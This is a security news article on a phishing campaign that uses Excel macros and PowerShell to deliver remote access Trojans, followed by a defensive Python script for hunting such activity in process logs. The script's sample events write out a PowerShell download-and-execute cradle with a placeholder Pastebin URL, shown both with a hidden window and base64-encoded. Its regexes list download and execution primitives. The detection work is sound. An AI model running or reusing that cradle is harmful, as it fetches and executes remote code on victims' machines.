Hackers use email phishing campaign to deploy multiple variants of Trojans

A new phishing campaign is delivering several remote access Trojan (RAT) variants to a narrow set of targets. Researchers at Cisco Talos Intelligence track the campaign as “Fajan” and assess that it may be operated from an Arabic-speaking country.

The researchers believe the campaign began in early March, at first against “low-profile” targets, apparently to check that the malware samples were being delivered correctly or to work out remaining debugging problems before moving on to the intended victims.

The attacks begin with emails aimed specifically at Bloomberg Industry Group customers. The company publishes news content for industries such as law, tax and accounting, and government, and sells it to its customers.

The emails claim to carry invoices; the attachments are instead Excel files containing hidden code that downloads a JavaScript- or VB-based payload carrying the RAT. “This allows hackers to take control of the infected system using HTTP over a TCP port,” the security report notes.

The choice of RATs as payloads suggests that the attackers' goal is victim monitoring and data theft. However, the command-and-control (C&C) servers were no longer responding when the researchers carried out their analysis, so the actual targets of the threat actors could not be determined.

One of the Trojans identified was NanoCore RAT, a commercial Trojan that has been sold since at least 2013. Its author was arrested in 2017 and sentenced to three years in prison; although this halted the original development of the RAT, many similar variants continue to appear.

This delivery technique was seen in roughly 60% of the samples analyzed. The remaining attachments instead contained Excel 4.0 macro formulas set to run when the workbook is opened. In both cases the embedded code is simple: it launches a PowerShell command line that downloads the next stage from a Pastebin URL and executes it.
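The chain described above (Excel macro, PowerShell download cradle, Pastebin-hosted next stage) leaves a recognizable trace in process-creation telemetry: an Office application spawning a shell whose command line references a download primitive and a paste site. The following hunting logic is an added example written for this article, not code from Cisco Talos or from the campaign itself. It assumes a record layout with a subset of Sysmon Event ID 1 fields (parent image, image, command line), and the events it scans are constructed here, including a constructed Pastebin URL; it also decodes `-EncodedCommand` arguments, since a base64-wrapped cradle would otherwise hide the URL from a plain substring match.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Assumed layout: a subset of Sysmon Event ID 1 (process creation) fields."""
    host: str
    parent_image: str
    image: str
    command_line: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "msaccess.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

PASTE_HOST = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.I)
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"\bIEX\b|Invoke-Expression|Start-BitsTransfer", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# powershell.exe accepts -EncodedCommand, -ec and -e; the payload is base64 of UTF-16LE text.
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_command_line(cmd: str) -> str:
    """Return the command line plus the decoded body of any -EncodedCommand argument."""
    m = ENCODED.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return cmd
    return cmd + "\n" + decoded


def classify(ev: ProcessEvent) -> list[str]:
    """List every indicator that fires on one event; an empty list means nothing of interest."""
    reasons = []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent in OFFICE_APPS and child in SHELLS:
        reasons.append(f"office-spawned-shell:{parent}->{child}")
    text = expand_command_line(ev.command_line)
    if ENCODED.search(ev.command_line):
        reasons.append("encoded-command")
    if HIDDEN.search(text):
        reasons.append("hidden-window")
    if CRADLE.search(text):
        reasons.append("download-cradle")
    if PASTE_HOST.search(text):
        reasons.append("pastebin-stage")
    return reasons


def hunt(events):
    """Return (host, severity, reasons) for each event with indicators.

    'high' requires the Office->shell parent/child edge plus a download cradle
    or paste-site URL; either half alone is 'medium'; anything else is 'low'.
    """
    hits = []
    for ev in events:
        reasons = classify(ev)
        if not reasons:
            continue
        office = any(r.startswith("office-spawned-shell") for r in reasons)
        strong = {"download-cradle", "pastebin-stage"} & set(reasons)
        if office and strong:
            severity = "high"
        elif office or strong:
            severity = "medium"
        else:
            severity = "low"
        hits.append((ev.host, severity, reasons))
    return hits


# Constructed sample telemetry (not real campaign data); the Pastebin URL is a placeholder.
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')"
SAMPLE_EVENTS = [
    ProcessEvent("WS-01", EXCEL, POWERSHELL, f'powershell -w hidden -c "{STAGE2}"'),
    # Same cradle, but hidden behind -enc so the URL never appears in clear text.
    ProcessEvent("WS-02", EXCEL, POWERSHELL,
                 "powershell -nop -w hidden -enc "
                 + base64.b64encode(STAGE2.encode("utf-16-le")).decode()),
    ProcessEvent("WS-03", r"C:\Windows\explorer.exe", POWERSHELL,
                 r"powershell -File C:\Scripts\inventory.ps1"),
    ProcessEvent("WS-04", EXCEL, r"C:\Windows\System32\cmd.exe", "cmd /c echo done"),
]

if __name__ == "__main__":
    for host, severity, reasons in hunt(SAMPLE_EVENTS):
        print(host, severity, ", ".join(reasons))
```

Run against the constructed events, WS-01 and WS-02 both score high (the encoded variant only because the base64 body is decoded before matching), WS-04 scores medium on the Office-to-cmd edge alone, and the explorer-launched script on WS-03 produces no hit. The parent/child edge is the durable part of this detection: URL hosts and cradle keywords change between campaigns, so keep those lists as tunable indicators rather than the rule itself.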

The researchers will continue to analyze these incidents in an attempt to determine the identity and objectives of the attackers. To learn more about information security risks, malware variants, vulnerabilities and information technologies, visit the International Institute of Cyber Security (IICS) websites.